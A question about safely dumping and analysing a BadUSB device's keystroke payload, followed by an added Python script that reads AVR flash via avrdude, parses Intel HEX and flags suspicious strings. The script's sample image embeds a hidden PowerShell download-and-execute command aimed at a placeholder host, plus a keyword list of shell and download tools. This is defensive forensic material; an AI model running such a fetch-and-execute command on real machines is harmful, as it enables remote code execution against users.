The situation: I received a BadUSB device, probably based on an ATmega32u4, armed with some kind of payload. I'd like to extract and analyze the payload. Then I'd like to reflash the device with my own payload. What I have to do this job with is my laptop, running Ubuntu, with the Arduino IDE installed.
The problem: how do I SECURELY examine the payload on my system and then reflash the device? I'm a little bit afraid that after plugging in the device it will immediately execute its payload. What's the right, professional DFIR approach in such situations? I thought about three options:
- execute payload under a live CD and somehow observe its actions
- redirect USB traffic to a safe environment like a virtual machine
- plug in the BadUSB in read-only mode, dump the payload somehow and analyze it statically
Please share your tips; I'm very, very curious and keen to learn.
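The third option (dump the flash, then analyze it offline) is the one that lends itself to a worked example. What follows is an added example, not code from the original post or from any answer to it: a small Python triage script that assembles the avrdude read command, parses the resulting Intel HEX flash image with checksum verification, and pulls out printable strings, which is where the keystroke payload of a typical Arduino-style BadUSB sketch (`Keyboard.print("...")` literals) ends up. The serial port `/dev/ttyACM0`, the `avr109`/Caterina bootloader assumption, and the sample image with its payload string are all assumptions constructed for the example; nothing here comes from the device described in the post.

```python
"""Static triage of an AVR flash dump (Intel HEX) read from a suspected BadUSB board.

Added example, not code from the original post. Assumptions (not from the page):
the board runs a Caterina-style avr109 bootloader reachable on /dev/ttyACM0 after
a reset, the dump is produced by avrdude, and the sample image below is constructed
here with an invented payload string.
"""

import re

# Constructed payload for the sample image; invented for this example only.
SAMPLE_PAYLOAD = (b"powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                  b".DownloadString('http://example.invalid/p')\"\x00")

# Strings a reviewer would want flagged in a HID-injection payload (assumed list).
SUSPICIOUS = ("powershell", "cmd.exe", "curl", "wget", "bash", "http://",
              "https://", "xterm", "gnome-terminal")


def avrdude_read_cmd(port="/dev/ttyACM0", out="dump.hex"):
    """avrdude invocation that READS flash (-U flash:r) via the avr109 bootloader.
    Port and programmer are assumptions; adjust for the board in hand."""
    return ["avrdude", "-c", "avr109", "-p", "m32u4", "-P", port,
            "-U", f"flash:r:{out}:i"]


def parse_ihex(text):
    """Parse Intel HEX into {address: byte}. Raises ValueError on a bad record
    or checksum, so a truncated or tampered dump is not silently accepted."""
    image, base = {}, 0
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        if not line.startswith(":"):
            raise ValueError(f"line {lineno}: record does not start with ':'")
        raw = bytes.fromhex(line[1:])
        if (sum(raw) & 0xFF) != 0:          # all bytes incl. checksum sum to 0 mod 256
            raise ValueError(f"line {lineno}: bad checksum")
        length, addr, rtype = raw[0], int.from_bytes(raw[1:3], "big"), raw[3]
        data = raw[4:4 + length]
        if len(data) != length or len(raw) != length + 5:
            raise ValueError(f"line {lineno}: length field does not match record")
        if rtype == 0x00:                   # data record
            for i, b in enumerate(data):
                image[base + addr + i] = b
        elif rtype == 0x01:                 # end of file
            break
        elif rtype == 0x02:                 # extended segment address
            base = int.from_bytes(data, "big") << 4
        elif rtype == 0x04:                 # extended linear address
            base = int.from_bytes(data, "big") << 16
        # types 0x03/0x05 carry start addresses and do not affect the image
    return image


def to_flat(image, fill=0xFF):
    """Flatten the sparse image into bytes; unprogrammed flash reads as 0xFF."""
    if not image:
        return b""
    return bytes(image.get(a, fill) for a in range(max(image) + 1))


def printable_strings(blob, min_len=4):
    """Equivalent of `strings -n 4` over the flattened flash."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def triage(strings):
    """Keep only strings that match the suspicious-keyword list."""
    return [s for s in strings if any(k in s.lower() for k in SUSPICIOUS)]


def analyze(text):
    """Parse a dump and return size, all strings, and keyword hits."""
    flat = to_flat(parse_ihex(text))
    strings = printable_strings(flat)
    return {"bytes": len(flat), "strings": strings, "hits": triage(strings)}


def _record(addr, data, rtype=0x00):
    """Build one Intel HEX record with a correct checksum (for the sample only)."""
    body = bytes([len(data)]) + addr.to_bytes(2, "big") + bytes([rtype]) + data
    return ":" + (body + bytes([(-sum(body)) & 0xFF])).hex().upper()


def sample_dump():
    """Constructed stand-in for an avrdude flash dump: a few 'jmp' vectors
    (0x940C little-endian, as real AVR images begin) then the payload at 0x100."""
    lines = [_record(0x0000, bytes([0x0C, 0x94, 0x5E, 0x00]) * 4)]
    for off in range(0, len(SAMPLE_PAYLOAD), 16):
        lines.append(_record(0x0100 + off, SAMPLE_PAYLOAD[off:off + 16]))
    lines.append(_record(0, b"", 0x01))
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print("read command:", " ".join(avrdude_read_cmd()))
    for hit in analyze(sample_dump())["hits"]:
        print("suspicious string:", hit)
```

Two caveats a practitioner would want. Reading through the Caterina bootloader means resetting the board into that bootloader, and on a normal power-up the sketch itself runs first, which is exactly the fear raised in the question; an ISP programmer on the SPI pads reads flash with the chip held in reset, so nothing executes, although set lock bits will block that read too. And a bootloader-based dump is only as trustworthy as the bootloader: if whoever armed the device replaced it, treat the dump with suspicion.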